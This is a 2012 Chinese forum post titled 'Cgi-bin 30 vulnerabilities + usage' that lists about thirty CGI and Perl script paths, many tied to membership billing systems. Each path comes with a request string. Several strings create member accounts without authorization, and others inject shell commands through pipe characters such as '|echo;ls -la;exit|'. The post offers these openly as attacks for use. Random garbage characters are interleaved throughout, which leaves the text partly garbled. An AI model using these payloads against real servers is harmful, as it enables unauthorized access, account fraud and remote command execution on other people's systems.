找回密码
 立即注册
查看: 3593|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================
: [0 a( k6 R) n, Z; X( d9 U5 o( j3 f
/smspass.pl. @1 D" _. U( T' w, _+ m
username=username&password=password  O2 Y8 F5 l8 {# X

; W5 J  C. z2 B. d/index.cgi
4 c2 e& I! |, o6 ]* Iwei=ren&gen=command
0 Y% z" I8 p3 w$ d3 `! m" _1 S# }' `5 l6 D$ a
/passmaster.cgi
$ h' U- X# `* H0 \% o4 d/ rAction=Add&Username=Username&Password=Password% F, `. k& i7 y) x
/ ?6 u" G& H5 s% T' X7 }
/accountcreate.cgi
# g) N" A$ f+ S, G: Vusername=username&password=password&ref1=|echo;ls|, n* _$ n, M3 `# K0 S

4 p/ E, p  ~8 E, I! I6 w+ t/form.cgi6 J. Q& S1 f; O% S9 F
name=xxxx&email=email&subject=xxxx&response=|echo;ls|
5 V! d' k4 I  G9 @" s
. E, d3 u4 f! `# P, e# w' i9 k% F/addusr.pl
( m/ A& B. }/ L& n' S) c  c9 r/cgi-bin/EuroDebit/addusr.pl( j+ I7 }1 L8 v# r' I
user=username&pass=Password&confirm=Password6 K2 i( a- D2 v/ f' D" L  W9 X

- {, j: I# A6 P3 [3 J/ccbill-local.asp% i& c) W7 g5 e# v
post_values=username:password
3 o8 H- }4 c1 q6 v9 Z4 w! i; J
* v9 V" s9 P" V6 b- F/count.cgi
" [; g0 E3 h" i. Y$ o1 spinfile=|echo;ls -la;exit|
1 Z! K  W- O; @! _
; a. w7 E1 ^0 Z: g; W/recon.cgi& F) C- R6 ?2 _7 B
/recon.cgi?search& P2 b! Q9 [- Z, W  e
searchoption=1&searchfor=|echo;ls -al;exit|1 E) @& x) D5 d% P2 H

0 T) f. H9 x+ c  P( K) ^6 E/verotelrum.pl* a5 h* ^" {. _' Y0 ^* T0 W
vercode=username:password:dseegsow:add:amount<&30>- B" g! Y; M  }- z
) @' G7 E) S( B- A
/af.cgi
* T* m3 z0 b8 i) Q. D& z2 f_browser_out=|echo;ls -la;exit;|* Z  M1 Z  ?( K6 b' I

) L  Q; I' A, p$ X/modify.cgi" O( A- R$ X8 ]. Q9 j( c7 c
username=username&password=password&expire=30; p1 A/ T7 S' I* ?
+ {; F7 S3 L% E' p
/openjournal.cgi& W, T; }4 k9 ~6 N, j
edit=1&ct=2&go=|echo;ls -al;exit|7 f5 m" o" t9 `
3 I4 l2 ]6 W7 e# ]( ]8 d
/gx9passwd.cgi
: @1 m! S$ n  H6 |cmd=ADD&user=username&pass=password
) ^7 l' s7 c( {5 g1 U! a8 {+ z+ t/ v3 ^: n' b2 l4 q
/probecontrol.cgi/ ^, {' G' t* y
command=enable&username=username&password=password
( F+ h2 j; B+ s! M
  s  M# Q2 C: y: M9 H/recon.cgi
. x: [: |2 U( D- K4 L9 tsearchoption=3&searchfor=echo;ls -la;exit
; v7 o" R& G6 Q( j8 O# i5 A! }8 j; \
/htadd.pl% W6 O# F+ G+ O; r( i$ K5 `
configfile=|echo; ls -alt; exit5 t& d! G# D' j5 Z( a# u' h
) V- v) t$ \% h5 S  }& h/ z2 g
/gx9passwd.cgi
# L0 P" l: q4 ~; ]cmd=ADD&user=username&pass=password9 E% a1 ~' I* g6 y

8 w" X# i( M* g1 A/ibill*.pl
0 Q2 ^6 K  B. xreqtype=add&authpwd=authpwd&username=username&password=password
# w" n& ~8 o7 ~: U/ V
: R; O$ h% T1 @' P* {4 a6 Q3 t/cpay.cgi
& j4 y. o6 d% P, F9 Q' j9 Q1 a5 Hcommand=add_member&username=username(EMAIL)&password=password(DES)
0 k- b% M8 Z' U8 k- B4 B4 e, J" w. G  b% u5 O$ g
/globill_ut.cgi
: |$ }: w) U  {; Tdo=add&username=username&password=password&wpassword=password/ Y# l3 d& S( C; [  }& @) V" v

  d% T0 c# r7 T) u/usercontrol.cgi
9 h4 Z* c# ]  H' [! E0 x! v; c, Kcommand=enable&username=USER&password=PASS
- ^' j, w2 J0 ]. T* ^
! l" V9 W. _* G! z! y/globoSALErum.cgi
8 a1 A* v' y: H/ p9 x2 Naction=ADD&seccode=seccode&login=username&password=password4 r; J  q$ J- G" {( X7 s
; I9 Q+ ]/ z0 b8 z4 @8 \) j
/addusr.pl% }- K% X( ?" O6 ?' X; a- s
user=USER&pass=PASS&confirm=PASS  P) G% l- t7 H" }- k. U! G  O* Y

- e9 G# I/ _" i, p/pincount.cgi
) H/ p  u  H. t& j/ w/cgi-bin/mastergate/pincount.cgi
- [; J1 E& V" F. U( a" |pinfile=|echo;pwd;exit|
1 H; m7 g8 H2 c& N7 T% ?8 q7 y
) w" n6 ~: G8 |; @( e4 m5 N/accountcreate.cgi
( g" B9 P) M# X% C0 H, s/cgi-bin/gateway/accountcreate.cgi
# h8 I0 v! @% ?( J' J, H% busername=username&password=password&password2=password&ref1=|echo;ls -al;exit0 V# T' Z% t' B* s
# R4 }5 P4 M" p% X
/af.cgi7 j  ^! x+ L0 U/ x9 f4 \
/env.cgi
6 ?# a# E: Z/ ~6 T$ P; l1 CADD+;echo;pwd;exit
# }  n; }9 J4 n+ j0 p& i, V6 ^  k! [
/count.cgi& |* s% V/ u: |: h! N1 o
pinfile=|echo;pwd;exit|# @9 W- I- ~5 l5 M* g
* h6 O- e9 d- J. T
/recon.cgi
- w* F: ~* o! n7 `8 Y4 G( o. esearchoption=1&searchfor=|echo;ls%20-al;exit|% L, ?; C: T9 K( v6 k% a0 v6 {% B0 ^
* e: N" X" D2 e( W* q) [) P3 r1 I: H
/add.cgi/ `( g3 _' g% v
username=username&password=password&expire=30# \" {0 _% q9 ]' W3 Q1 R
8 f" C% x- a* l: L
==============================: S' c' U% b- e2 @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表